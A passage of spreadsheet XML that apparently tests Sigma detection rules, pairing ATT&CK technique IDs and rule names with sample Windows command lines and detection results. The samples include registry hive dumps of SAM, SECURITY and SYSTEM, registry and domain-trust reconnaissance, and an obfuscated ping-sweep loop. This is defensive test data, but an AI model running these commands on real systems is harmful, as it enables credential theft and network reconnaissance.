      <c r="C1694" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1694" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1694" s="43" t="inlineStr">
        <is>
          <t>reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices</t>
        </is>
      </c>
      <c r="F1694" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1694" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1694" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1694" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1695" ht="15.75" customHeight="1" s="42">
      <c r="A1695" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1695" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1695" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1695" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1695" s="43" t="inlineStr">
        <is>
          <t>reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</t>
        </is>
      </c>
      <c r="F1695" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1695" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1695" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1695" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1696" ht="15.75" customHeight="1" s="42">
      <c r="A1696" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1696" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1696" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1696" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1696" s="43" t="inlineStr">
        <is>
          <t>reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</t>
        </is>
      </c>
      <c r="F1696" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1696" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1696" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1696" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1697" ht="15.75" customHeight="1" s="42">
      <c r="A1697" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1697" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1697" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1697" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1697" s="43" t="inlineStr">
        <is>
          <t>reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce</t>
        </is>
      </c>
      <c r="F1697" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1697" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1697" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1697" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1698" ht="15.75" customHeight="1" s="42">
      <c r="A1698" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1698" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C1698" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D1698" s="43" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E1698" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /E C:\temp\sam.reg HKLM\SAM</t>
        </is>
      </c>
      <c r="F1698" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1698" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File (82880171-b475-4201-b811-e9c826cd5eaa); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J1698" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1698" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1699" ht="15.75" customHeight="1" s="42">
      <c r="A1699" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1699" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C1699" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D1699" s="43" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E1699" s="43" t="inlineStr">
        <is>
          <t>regedit.exe -E C:\temp\system.reg "HKLM\SYSTEM"</t>
        </is>
      </c>
      <c r="F1699" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1699" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1699" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J1699" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1699" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1700" ht="15.75" customHeight="1" s="42">
      <c r="A1700" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1700" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C1700" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D1700" s="43" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E1700" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /E C:\temp\security.reg HKLM\SECURITY</t>
        </is>
      </c>
      <c r="F1700" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1700" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File (82880171-b475-4201-b811-e9c826cd5eaa); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J1700" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1700" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1701" ht="15.75" customHeight="1" s="42">
      <c r="A1701" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1701" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C1701" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D1701" s="43" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E1701" s="43" t="inlineStr">
        <is>
          <t>reg.exe save HKLM\SYSTEM C:\temp\system.save</t>
        </is>
      </c>
      <c r="F1701" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1701" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1701" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE (fd877b94-9bb5-4191-bb25-d79cbd93c167)</t>
        </is>
      </c>
      <c r="J1701" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1701" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1702" ht="15.75" customHeight="1" s="42">
      <c r="A1702" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1702" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1702" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1702" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1702" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\Software</t>
        </is>
      </c>
      <c r="F1702" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1702" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J1702" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1702" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1703" ht="15.75" customHeight="1" s="42">
      <c r="A1703" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1703" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1703" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1703" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1703" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\\Software</t>
        </is>
      </c>
      <c r="F1703" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1703" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J1703" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1703" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1704" ht="15.75" customHeight="1" s="42">
      <c r="A1704" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1704" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1704" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1704" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1704" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER/Software</t>
        </is>
      </c>
      <c r="F1704" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1704" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J1704" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1704" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1705" ht="15.75" customHeight="1" s="42">
      <c r="A1705" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1705" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1705" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1705" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1705" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\Software /y</t>
        </is>
      </c>
      <c r="F1705" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1705" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J1705" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1705" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1706" ht="15.75" customHeight="1" s="42">
      <c r="A1706" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1706" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1706" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1706" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1706" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /e C:\temp\export.reg HKEY_CURRENT_USER\Software &gt; NUL</t>
        </is>
      </c>
      <c r="F1706" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1706" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J1706" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1706" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1707" ht="15.75" customHeight="1" s="42">
      <c r="A1707" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1707" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1707" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1707" s="43" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1707" s="43" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet\ Explorer" /v svcVersion</t>
        </is>
      </c>
      <c r="F1707" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1707" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1707" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1707" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1708" ht="15.75" customHeight="1" s="42">
      <c r="A1708" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1708" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1708" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1708" s="43" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1708" s="43" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion</t>
        </is>
      </c>
      <c r="F1708" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1708" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1708" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1708" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1709" ht="15.75" customHeight="1" s="42">
      <c r="A1709" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1709" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1709" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1709" s="43" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1709" s="43" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\software\microsoft\internet explorer" /v svcVersion</t>
        </is>
      </c>
      <c r="F1709" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1709" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1709" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1709" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1710" ht="15.75" customHeight="1" s="42">
      <c r="A1710" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1710" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1710" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1710" s="43" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1710" s="43" t="inlineStr">
        <is>
          <t>reg query HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet\ Explorer /v svcVersion</t>
        </is>
      </c>
      <c r="F1710" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1710" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1710" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1710" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1711" ht="15.75" customHeight="1" s="42">
      <c r="A1711" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1711" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1711" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1711" s="43" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1711" s="43" t="inlineStr">
        <is>
          <t>reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer /v svcVersion</t>
        </is>
      </c>
      <c r="F1711" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1711" s="43" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1711" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1711" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1712" ht="15.75" customHeight="1" s="42">
      <c r="A1712" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1712" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1712" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1712" s="43" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1712" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\net1.exe  " time" \localhost</t>
        </is>
      </c>
      <c r="F1712" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1712" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427)</t>
        </is>
      </c>
      <c r="J1712" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1712" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1713" ht="15.75" customHeight="1" s="42">
      <c r="A1713" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1713" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1713" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1713" s="43" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1713" s="43" t="inlineStr">
        <is>
          <t>net.exe  time /? \localhost</t>
        </is>
      </c>
      <c r="F1713" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1713" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427); Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427)</t>
        </is>
      </c>
      <c r="J1713" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1713" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1714" ht="15.75" customHeight="1" s="42">
      <c r="A1714" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1714" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1714" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1714" s="43" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1714" s="43" t="inlineStr">
        <is>
          <t>w32tm.exe  /query /tz</t>
        </is>
      </c>
      <c r="F1714" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1714" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427)</t>
        </is>
      </c>
      <c r="J1714" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1714" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1715" ht="15.75" customHeight="1" s="42">
      <c r="A1715" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1715" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1715" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1715" s="43" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1715" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\net.exe time \\localhost</t>
        </is>
      </c>
      <c r="F1715" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1715" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427); Discovery of a System Time (b243b280-65fe-48df-ba07-6ddea7646427)</t>
        </is>
      </c>
      <c r="J1715" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1715" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1716" ht="15.75" customHeight="1" s="42">
      <c r="A1716" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1716" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C1716" s="43" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D1716" s="43" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E1716" s="43" t="inlineStr">
        <is>
          <t>reg.exe save HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1716" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1716" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1716" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE (fd877b94-9bb5-4191-bb25-d79cbd93c167)</t>
        </is>
      </c>
      <c r="J1716" s="43" t="n"/>
      <c r="K1716" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1717" ht="15.75" customHeight="1" s="42">
      <c r="A1717" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1717" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1717" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1717" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1717" s="43" t="inlineStr">
        <is>
          <t>wmic /namespace:\root\microsoftactivedirectory class Microsoft_DomainTrustStatus get /format:list</t>
        </is>
      </c>
      <c r="F1717" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1717" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1717" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1717" s="43" t="n"/>
      <c r="J1717" s="43" t="n"/>
      <c r="K1717" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1718" ht="15.75" customHeight="1" s="42">
      <c r="A1718" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1718" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_scan_loop</t>
        </is>
      </c>
      <c r="C1718" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scan Loop Network</t>
        </is>
      </c>
      <c r="D1718" s="43" t="inlineStr">
        <is>
          <t>f8ad2e2c-40b6-4117-84d7-20b89896ab23</t>
        </is>
      </c>
      <c r="E1718" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "f^o^r /L %i in (1,1,254) do p^i^n^g -n 1 192.168.1.%i"</t>
        </is>
      </c>
      <c r="F1718" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1718" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1718" s="43" t="b">
